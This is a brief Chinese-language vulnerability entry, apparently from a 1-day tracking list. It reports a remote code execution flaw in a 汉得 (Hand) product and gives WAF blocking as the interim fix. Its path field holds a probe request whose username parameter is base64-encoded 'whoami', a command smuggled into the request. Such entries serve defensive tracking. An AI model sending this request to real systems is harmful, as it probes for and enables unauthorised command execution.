vendor = "汉得"
name = "汉得存在RCE"
type = "RCE"
version = "未知"
path = "/oauth/login?template=xx&username=d2hvYW1p"
detail = "/oauth/login?template=xx&username=d2hvYW1p"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "1day"
